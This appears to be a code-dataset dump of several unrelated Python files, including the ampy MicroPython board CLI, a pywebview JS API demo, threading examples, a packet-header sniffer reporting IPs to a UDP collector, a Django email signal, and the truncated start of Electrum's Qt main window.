source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
cli.py
|
# Adafruit MicroPython Tool - Command Line Interface
# Author: Tony DiCola
# Copyright (c) 2016 Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Change Logs:
# Date Author Notes
# 2019-10-10 SummerGift Improve the code architecture
from __future__ import print_function
import os
import platform
import posixpath
import re
import serial
import serial.serialutil
import serial.tools.list_ports
import threading
import click
import dotenv
import sys
import time
import hashlib
import json
import ampy.files as files
import ampy.pyboard as pyboard
import gc
from ampy.getch import getch
from ampy.file_sync import file_sync_info
from ampy.file_sync import _get_file_crc32
from ampy.pyboard import stdout
# Load AMPY_PORT et al from .ampy file
# Performed here because we need to beat click's decorators.
config = dotenv.find_dotenv(filename=".ampy", usecwd=True)
if config:
dotenv.load_dotenv(dotenv_path=config)
serial_reader_running = None
serial_out_put_enable = True
serial_out_put_count = 0
_board = None
_system = None
class CliError(BaseException):
pass
def windows_full_port_name(portname):
# Helper function to generate proper Windows COM port paths. Apparently
# Windows requires COM ports above 9 to have a special path, where ports below
# 9 are just referred to by COM1, COM2, etc. (wacky!) See this post for
# more info and where this code came from:
# http://eli.thegreenplace.net/2009/07/31/listing-all-serial-ports-on-windows-with-python/
m = re.match("^COM(\d+)$", portname)
if m and int(m.group(1)) < 10:
return portname
else:
return "\\\\.\\{0}".format(portname)
@click.group()
@click.option(
"--port",
"-p",
envvar="AMPY_PORT",
required=True,
type=click.STRING,
help="Name of serial port for connected board. Can optionally specify with AMPY_PORT environment variable.",
metavar="PORT",
)
@click.option(
"--baud",
"-b",
envvar="AMPY_BAUD",
default=115200,
type=click.INT,
help="Baud rate for the serial connection (default 115200). Can optionally specify with AMPY_BAUD environment variable.",
metavar="BAUD",
)
@click.option(
"--delay",
"-d",
envvar="AMPY_DELAY",
default=0,
type=click.FLOAT,
help="Delay in seconds before entering RAW MODE (default 0). Can optionally specify with AMPY_DELAY environment variable.",
metavar="DELAY",
)
@click.version_option()
def cli(port, baud, delay):
"""ampy - Adafruit MicroPython Tool
Ampy is a tool to control MicroPython boards over a serial connection. Using
ampy you can manipulate files on the board's internal filesystem and even run
scripts.
"""
global _board
global _system
if platform.system() == "Windows":
_system = "Windows"
if platform.system() == "Linux":
_system = "Linux"
if port != "query":
# On Windows fix the COM port path name for ports above 9 (see comment in
# windows_full_port_name function).
if platform.system() == "Windows":
port = windows_full_port_name(port)
_board = pyboard.Pyboard(port, baudrate=baud, rawdelay=delay)
@cli.command()
@click.argument("remote_file")
@click.argument("local_file", type=click.File("wb"), required=False)
def get(remote_file, local_file):
"""
Retrieve a file from the board.
Get will download a file from the board and print its contents or save it
locally. You must pass at least one argument which is the path to the file
to download from the board. If you don't specify a second argument then
the file contents will be printed to standard output. However if you pass
a file name as the second argument then the contents of the downloaded file
will be saved to that file (overwriting anything inside it!).
For example to retrieve the boot.py and print it out run:
ampy --port /board/serial/port get boot.py
Or to get main.py and save it as main.py locally run:
ampy --port /board/serial/port get main.py main.py
"""
# Get the file contents.
board_files = files.Files(_board)
contents = board_files.get(remote_file)
# Print the file out if no local file was provided, otherwise save it.
if local_file is None:
print(contents.decode("utf-8"))
else:
local_file.write(contents)
@cli.command()
@click.option(
"--exists-okay", is_flag=True, help="Ignore if the directory already exists."
)
@click.argument("directory")
def mkdir(directory, exists_okay):
"""
Create a directory on the board.
Mkdir will create the specified directory on the board. One argument is
required, the full path of the directory to create.
Note that you cannot recursively create a hierarchy of directories with one
mkdir command, instead you must create each parent directory with separate
mkdir command calls.
For example to make a directory under the root called 'code':
ampy --port /board/serial/port mkdir /code
"""
# Run the mkdir command.
board_files = files.Files(_board)
board_files.mkdir(directory, exists_okay=exists_okay)
@cli.command()
@click.argument("directory", default="/")
@click.option(
"--long_format",
"-l",
is_flag=True,
help="Print long format info including size of files. Note the size of directories is not supported and will show 0 values.",
)
@click.option(
"--recursive",
"-r",
is_flag=True,
help="recursively list all files and (empty) directories.",
)
def ls(directory, long_format, recursive):
"""List contents of a directory on the board.
Can pass an optional argument which is the path to the directory. The
default is to list the contents of the root, /, path.
For example to list the contents of the root run:
ampy --port /board/serial/port ls
Or to list the contents of the /foo/bar directory on the board run:
ampy --port /board/serial/port ls /foo/bar
Add the -l or --long_format flag to print the size of files (however note
MicroPython does not calculate the size of folders and will show 0 bytes):
ampy --port /board/serial/port ls -l /foo/bar
"""
# List each file/directory on a separate line.
board_files = files.Files(_board)
for f in board_files.ls(directory, long_format=long_format, recursive=recursive):
print(f)
@cli.command()
@click.argument("local", type=click.Path(exists=True))
@click.argument("remote", required=False)
def put(local, remote):
"""Put a file or folder and its contents on the board.
Put will upload a local file or folder to the board. If the file already
exists on the board it will be overwritten with no warning! You must pass
at least one argument which is the path to the local file/folder to
upload. If the item to upload is a folder then it will be copied to the
board recursively with its entire child structure. You can pass a second
optional argument which is the path and name of the file/folder to put to
on the connected board.
For example to upload a main.py from the current directory to the board's
root run:
ampy --port /board/serial/port put main.py
Or to upload a board_boot.py from a ./foo subdirectory and save it as boot.py
in the board's root run:
ampy --port /board/serial/port put ./foo/board_boot.py boot.py
To upload a local folder adafruit_library and all of its child files/folders
as an item under the board's root run:
ampy --port /board/serial/port put adafruit_library
Or to put a local folder adafruit_library on the board under the path
/lib/adafruit_library on the board run:
ampy --port /board/serial/port put adafruit_library /lib/adafruit_library
"""
# Use the local filename if no remote filename is provided.
if remote is None:
remote = os.path.basename(os.path.abspath(local))
# Check if path is a folder and do recursive copy of everything inside it.
# Otherwise it's a file and should simply be copied over.
if os.path.isdir(local):
# Directory copy, create the directory and walk all children to copy
# over the files.
dir_del_flag = True
board_files = files.Files(_board)
for parent, child_dirs, child_files in os.walk(local):
# Create board filesystem absolute path to parent directory.
remote_parent = posixpath.normpath(
posixpath.join(remote, os.path.relpath(parent, local))
)
try:
# if dir already exist, remove that dir, only perform once.
if dir_del_flag:
board_files.rmdir(remote_parent, missing_okay=True)
dir_del_flag = False
# Create remote parent directory.
board_files.mkdir(remote_parent)
# Loop through all the files and put them on the board too.
for filename in child_files:
with open(os.path.join(parent, filename), "rb") as infile:
remote_filename = posixpath.join(remote_parent, filename)
board_files.put(remote_filename, infile.read())
except files.DirectoryExistsError:
# Ignore errors for directories that already exist.
pass
else:
# File copy, open the file and copy its contents to the board.
# Put the file on the board.
with open(local, "rb") as infile:
board_files = files.Files(_board)
board_files.put(remote, infile.read())
@cli.command()
@click.argument("remote_file")
def rm(remote_file):
"""Remove a file from the board.
Remove the specified file from the board's filesystem. Must specify one
argument which is the path to the file to delete. Note that this can't
delete directories which have files inside them, but can delete empty
directories.
For example to delete main.py from the root of a board run:
ampy --port /board/serial/port rm main.py
"""
# Delete the provided file/directory on the board.
board_files = files.Files(_board)
board_files.rm(remote_file)
@cli.command()
@click.option(
"--missing-okay", is_flag=True, help="Ignore if the directory does not exist."
)
@click.argument("remote_folder")
def rmdir(remote_folder, missing_okay):
"""Forcefully remove a folder and all its children from the board.
Remove the specified folder from the board's filesystem. Must specify one
argument which is the path to the folder to delete. This will delete the
directory and ALL of its children recursively, use with caution!
For example to delete everything under /adafruit_library from the root of a
board run:
ampy --port /board/serial/port rmdir adafruit_library
"""
# Delete the provided file/directory on the board.
board_files = files.Files(_board)
board_files.rmdir(remote_folder, missing_okay=missing_okay)
@cli.command()
@click.argument("local_file")
@click.option(
"--no-output",
"-n",
is_flag=True,
help="Run the code without waiting for it to finish and print output. Use this when running code with main loops that never return.",
)
@click.option(
"--device_file",
"-d",
envvar="run file in device",
default=0,
type=click.STRING,
help="run file in device",
metavar="run file in device",
)
def run(local_file, no_output, device_file):
"""Run a script and print its output.
Run will send the specified file to the board and execute it immediately.
Any output from the board will be printed to the console (note that this is
not a 'shell' and you can't send input to the program).
Note that if your code has a main or infinite loop you should add the --no-output
option. This will run the script and immediately exit without waiting for
the script to finish and print output.
For example to run a test.py script and print any output after it finishes:
ampy --port /board/serial/port run test.py
Or to run test.py and not wait for it to finish:
ampy --port /board/serial/port run --no-output test.py
"""
# Run the provided file and print its output.
board_files = files.Files(_board)
try:
if device_file:
output = board_files.run_in_device(device_file, not no_output)
else:
output = board_files.run(local_file, not no_output)
if output is not None:
print(output.decode("utf-8"), end="")
except IOError:
click.echo(
"Failed to find or read input file: {0}".format(local_file), err=True
)
@cli.command()
@click.option(
"--bootloader", "mode", flag_value="BOOTLOADER", help="Reboot into the bootloader"
)
@click.option(
"--hard",
"mode",
flag_value="NORMAL",
help="Perform a hard reboot, including running init.py",
)
@click.option(
"--repl",
"mode",
flag_value="SOFT",
default=True,
help="Perform a soft reboot, entering the REPL [default]",
)
@click.option(
"--safe",
"mode",
flag_value="SAFE_MODE",
help="Perform a safe-mode reboot. User code will not be run and the filesystem will be writeable over USB",
)
def reset(mode):
"""Perform soft reset/reboot of the board.
Will connect to the board and perform a reset. Depending on the board
and firmware, several different types of reset may be supported.
ampy --port /board/serial/port reset
"""
_board.enter_raw_repl()
if mode == "SOFT":
_board.exit_raw_repl()
return
_board.exec_(
"""if 1:
def on_next_reset(x):
try:
import microcontroller
except:
if x == 'NORMAL': return ''
return 'Reset mode only supported on CircuitPython'
try:
microcontroller.on_next_reset(getattr(microcontroller.RunMode, x))
except ValueError as e:
return str(e)
return ''
def reset():
try:
import microcontroller
except:
import machine as microcontroller
microcontroller.reset()
"""
)
r = _board.eval("on_next_reset({})".format(repr(mode)))
print("here we are", repr(r))
if r:
click.echo(r, err=True)
return
try:
_board.exec_("reset()")
except serial.serialutil.SerialException as e:
# An error is expected to occur, as the board should disconnect from
# serial when restarted via microcontroller.reset()
pass
def repl_serial_to_stdout(serial):
global _system
global serial_out_put_count
def hexsend(string_data=''):
hex_data = string_data.decode("hex")
return hex_data
try:
data = b''
while serial_reader_running:
count = serial.inWaiting()
if count == 0:
time.sleep(0.01)
continue
if count > 0:
try:
data += serial.read(count)
if len(data) < 20:
try:
data.decode()
except UnicodeDecodeError:
continue
if data != b'':
if serial_out_put_enable and serial_out_put_count > 0:
if _system == "Linux":
sys.stdout.buffer.write(data)
else:
sys.stdout.buffer.write(data.replace(b"\r", b""))
sys.stdout.buffer.flush()
else:
serial.write(hexsend(data))
data = b''
serial_out_put_count += 1
except serial.serialutil.SerialException:
# This happens if the pyboard reboots, or a USB port
# goes away.
return
except TypeError:
# This is a bug in serialposix.py starting with python 3.3
# which causes a TypeError during the handling of the
# select.error. So we treat this the same as
# serial.serialutil.SerialException:
return
except ConnectionResetError:
# This happens over a telnet session, if it resets
return
except KeyboardInterrupt:
if serial != None:
serial.close()
@cli.command()
@click.option(
"--query",
"-q",
envvar="query_is_can_be_connected",
# required=True,
default=None,
type=click.STRING,
help="Query whether the com port can be connected",
metavar="query",
)
def repl(query = None):
global serial_reader_running
global serial_out_put_enable
global serial_out_put_count
serial_out_put_count = 1
serial_reader_running = True
if query != None:
return
_board.read_until_hit()
serial = _board.serial
repl_thread = threading.Thread(target = repl_serial_to_stdout, args=(serial,), name='REPL_serial_to_stdout')
repl_thread.daemon = True
repl_thread.start()
try:
# Wake up the prompt
serial.write(b'\r')
count = 0
while True:
char = getch()
if char == b'\x16':
char = b'\x03'
count += 1
if count == 1000:
time.sleep(0.1)
count = 0
if char == b'\x07':
serial_out_put_enable = False
continue
if char == b'\x0F':
serial_out_put_enable = True
serial_out_put_count = 0
continue
if char == b'\x00':
continue
if not char:
continue
if char == b'\x18': # enter ctrl + x to exit repl mode
serial_reader_running = False
# When using telnet with the WiPy, it doesn't support
# an initial timeout. So for the meantime, we send a
# space which should cause the wipy to echo back a
# space which will wakeup our reader thread so it will
# notice the quit.
serial.write(b' ')
# Give the reader thread a chance to detect the quit
# then we don't have to call getch() above again which
# means we'd need to wait for another character.
time.sleep(0.1)
# Print a newline so that the rshell prompt looks good.
print('')
# We stay in the loop so that we can still enter
# characters until we detect the reader thread quitting
# (mostly to cover off weird states).
return
if char == b'\n':
serial.write(b'\r')
else:
serial.write(char)
except DeviceError as err:
# The device is no longer present.
self.print('')
self.stdout.flush()
print_err(err)
print("exit repl")
repl_thread.join()
@cli.command()
@click.option(
"--local_path",
"-l",
envvar="local_path",
required=True,
default=0,
type=click.STRING,
help="local_path",
metavar="local_path",
)
@click.option(
"--file_pathname",
"-f",
envvar="file_pathname",
required=True,
default=0,
type=click.STRING,
help="file pathname",
metavar="file_pathname",
)
@click.option(
"--remote_path",
"-r",
envvar="remote_path",
required=True,
default=0,
type=click.STRING,
help="remote_path",
metavar="remote_path",
)
@click.option(
"--info_pathname",
"-i",
envvar="info_pathname",
# required=True,
default=None,
type=click.STRING,
help="info_pathname",
metavar="info_pathname",
)
@click.option(
"--query",
"-q",
envvar="query",
# required=True,
default=None,
type=click.STRING,
help="query",
metavar="query",
)
def sync(local_path, file_pathname, remote_path = None, info_pathname = None, query = None):
def _sync_file(sync_info, local, remote = None):
local = local.replace('\\', '/')
delete_file_list = sync_info["delete"]
sync_file_list = sync_info["sync"]
if delete_file_list == [] and sync_file_list == []:
return
board_files = files.Files(_board)
# Directory copy, create the directory and walk all children to copy
# over the files.
for parent, child_dirs, child_files in os.walk(local):
# Create board filesystem absolute path to parent directory.
remote_parent = posixpath.normpath(
posixpath.join(local, os.path.relpath(parent, local))
)
try:
# Create remote parent directory.
dir_name = remote_parent[len(local_path) + 1:]
if dir_name != "":
board_files.mkdir(dir_name)
# Loop through all the files and put them on the board too.
except files.DirectoryExistsError:
# Ignore errors for directories that already exist.
pass
# add sync files
for item in sync_file_list:
# File copy, open the file and copy its contents to the board.
# Put the file on the board.
print("file to add:%s"%item)
item_local = os.path.join(local_path, item).replace('\\', '/')
with open(item_local, "rb") as infile:
board_files = files.Files(_board)
board_files.put(item, infile.read())
# delete files
for item in delete_file_list:
# Delete the provided file/directory on the board.
# board_files.rmdir(item, True)
print("file to del:%s"%item)
if item != '':
board_files.rm(item)
# check if need sync
if query == "ifneedsync":
if not os.path.exists(info_pathname):
print("<file need sync>")
else:
# Gets file synchronization information
sync_info, pc_file_info = file_sync_info(local_path, info_pathname)
if sync_info['delete'] == [] and sync_info['sync'] == []:
print("<no need to sync>")
else:
print("<file need sync>")
return
# check repl rtt uos
_board.get_board_identity()
if not _board.is_have_uos():
raise PyboardError('Error: The uos module is not enabled')
rtt_version_flag = False
if _board.is_rtt_micropython():
rtt_version_flag = True
# ready to sync
if info_pathname == None:
info_pathname = "file_info.json"
if not os.path.exists(info_pathname):
# List each file/directory on a separate line.
board_files = files.Files(_board)
board_files._ls_sync(long_format=True, recursive=True, pathname = info_pathname)
# Gets file synchronization information
sync_info, pc_file_info = file_sync_info(local_path, info_pathname, rtt_version_flag)
# print("sync_info------------------------------")
# print(sync_info)
# print("pc_file_info------------------------------")
# print(pc_file_info)
if sync_info['delete'] == [] and sync_info['sync'] == []:
print("<no need to sync>")
return
try:
# Perform file synchronization
_sync_file(sync_info, local_path)
except:
raise CliError("error: _file_sync failed, please restart and retry.")
# After successful file synchronization, update the local cache file information
with open(info_pathname, 'w') as f:
f.write(str(pc_file_info))
_board.soft_reset_board()
@cli.command()
def portscan(port=None):
"""Scan all serial ports on your system."""
port_list = list(serial.tools.list_ports.comports())
if len(port_list) <= 0:
print("can't find any serial in system.")
else:
print([list(port_list[i])[0] for i in range(0, len(port_list))])
del port_list
gc.collect()
# os._exit(0)
if __name__ == "__main__":
try:
cli()
finally:
# Try to ensure the board serial connection is always gracefully closed.
if _board is not None:
try:
_board.close()
except:
# Swallow errors when attempting to close as it's just a best effort
# and shouldn't cause a new error or problem if the connection can't
# be closed.
pass
|
js_api.py
|
import webview
import threading
import time
import sys
import random
"""
This example demonstrates how to create a pywebview api without using a web
server
"""
html = """
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<style>
#response-container {
display: none;
padding: 3rem;
margin: 3rem 5rem;
font-size: 120%;
border: 5px dashed #ccc;
}
button {
font-size: 100%;
padding: 0.5rem;
margin: 0.3rem;
text-transform: uppercase;
}
</style>
</head>
<body>
<h1>JS API Example</h1>
<button onClick="initialize()">Hello Python</button><br/>
<button id="heavy-stuff-btn" onClick="doHeavyStuff()">Perform a heavy operation</button><br/>
<button onClick="getRandomNumber()">Get a random number</button><br/>
<div id="response-container"></div>
<script>
function showResponse(response) {
var container = document.getElementById('response-container')
container.innerText = response.message
container.style.display = 'block'
}
function initialize() {
pywebview.api.init().then(showResponse)
}
function doHeavyStuff() {
var btn = document.getElementById('heavy-stuff-btn')
pywebview.api.doHeavyStuff().then(function(response) {
showResponse(response)
btn.onclick = doHeavyStuff
btn.innerText = 'Perform a heavy operation'
})
showResponse({message: 'Working...'})
btn.innerText = 'Cancel the heavy operation'
btn.onclick = cancelHeavyStuff
}
function cancelHeavyStuff() {
pywebview.api.cancelHeavyStuff()
}
function getRandomNumber() {
pywebview.api.getRandomNumber().then(showResponse)
}
</script>
</body>
</html>
"""
class Api:
def __init__(self):
self.cancel_heavy_stuff_flag = False
def init(self, params):
response = {
'message': 'Hello from Python {0}'.format(sys.version)
}
return response
def getRandomNumber(self, params):
response = {
'message': 'Here is a random number courtesy of randint: {0}'.format(random.randint(0, 100000000))
}
return response
def doHeavyStuff(self, params):
time.sleep(0.1) # sleep to prevent from the ui thread from freezing for a moment
now = time.time()
self.cancel_heavy_stuff_flag = False
for i in range(0, 1000000):
_ = i * random.randint(0, 1000)
if self.cancel_heavy_stuff_flag:
response = {'message': 'Operation cancelled'}
break
else:
then = time.time()
response = {
'message': 'Operation took {0:.1f} seconds on the thread {1}'.format((then - now), threading.current_thread())
}
return response
def cancelHeavyStuff(self, params):
time.sleep(0.1)
self.cancel_heavy_stuff_flag = True
def create_app():
webview.load_html(html)
if __name__ == '__main__':
t = threading.Thread(target=create_app)
t.start()
api = Api()
webview.create_window('API example', js_api=api)
|
thread.py
|
import logging
import threading
import time
import concurrent.futures
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
def launch_one_daemon_thread():
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,), daemon=True)
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
x.join()
logging.info("Main : all done")
def launch_multiple_threads(thread_count):
threads = list()
for index in range(thread_count):
logging.info("Main : create and start thread %d.", index)
x = threading.Thread(target=thread_function, args=(index,))
threads.append(x)
x.start()
for index, thread in enumerate(threads):
logging.info("Main : before joining thread %d.", index)
thread.join()
logging.info("Main : thread %d done", index)
def launch_thread_pool_executor(thread_count):
with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
executor.map(thread_function, range(thread_count))
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format,
level=logging.INFO,
datefmt="%H:%M:%S")
launch_thread_pool_executor(3)
|
statSender.py
|
import pika
import sys
import socket
import struct
import binascii
import netifaces as ni
import pickle
import threading
import time
import logging
encoding = "utf-8"
class Messenger:
def __init__(self,server_address):
self.server_address = server_address
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def send(self,payload):
self.sock.sendto(payload,self.server_address)
logging.info("sent to Collector {}".format(payload))
def close(self):
self.sock.close()
class Sniffer(Messenger):
def __init__(self,server_address):
super(Sniffer,self).__init__(server_address)
self.s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.IPPROTO_IP)
self.s.bind(("brl700000F", 0x0800))
self.ip4 = ni.ifaddresses("brl700000F")[ni.AF_INET][0]['addr']
self.snifferThread = threading.Thread(target=self.startSniffing)
self.snifferThread.start()
self.snifferThread.join()
def startSniffing(self):
while True:
packet = self.s.recvfrom(10000)
ethernet_header = packet[0][0:14]
eth_header = struct.unpack("!6s6s2s", ethernet_header)
logging.info("Destination MAC:" + str(binascii.hexlify(eth_header[0]),encoding) + " Source MAC:" + str(binascii.hexlify(eth_header[1]),encoding)
+ " Type:" + str(binascii.hexlify(eth_header[2]),encoding))
ipheader = packet[0][14:34]
ip_header = struct.unpack("!12s4s4s", ipheader)
srcIP = socket.inet_ntoa(ip_header[1])
dstIP = socket.inet_ntoa(ip_header[2])
packet_info = "Source IP: {} Destination IP: {}".format(srcIP,dstIP)
packet_info = "Receiver: {} ".format(self.ip4)+packet_info
payload = {"Receiver":self.ip4, "SrcIP":socket.inet_ntoa(ip_header[1]), "DstIP":socket.inet_ntoa(ip_header[2])}
payload = pickle.dumps(payload)
logging.info(packet_info)
self.send(payload)
if __name__=="__main__":
format = "%(asctime)s %(message)s"
logging.basicConfig(format=format,datefmt="%H:%M:%S",level=logging.INFO)
remote = '130.127.133.198'
server_address = (remote, 10000)
sniffer = Sniffer(server_address)
|
signals.py
|
from datetime import timedelta
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth import get_user_model
from django.utils import timezone
from django.utils.datetime_safe import datetime
from todo_app.models import Verification, Post
from todo_app.tasks import warning_email
from threading import Thread
User = get_user_model()
#
# @receiver(post_save, sender=Verification, dispatch_uid='send_mail_to_user')
# def send_mail_to_user(*args, **kwargs):
# obj = kwargs.get("instance")
# created = kwargs.get("created")
# if created:
# link = f"http://localhost:8008/verify/{obj.token}/{obj.user_id}/"
# background_job = Thread(target=warning_email, args=(obj.user.email, link))
# background_job.start()
#
#
@receiver(post_save, sender=Verification, dispatch_uid='send_mail_to_user')
def send_mail_to_user(*args, **kwargs):
obj = kwargs.get("instance")
now = datetime.now(timezone.utc)
post = Post.objects.all()
date = post.datetime - now - timedelta(seconds=600)
link = f"http://localhost:8000/"
warning_email.apply_async(args=(obj.user.email, link), eta=now + date)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
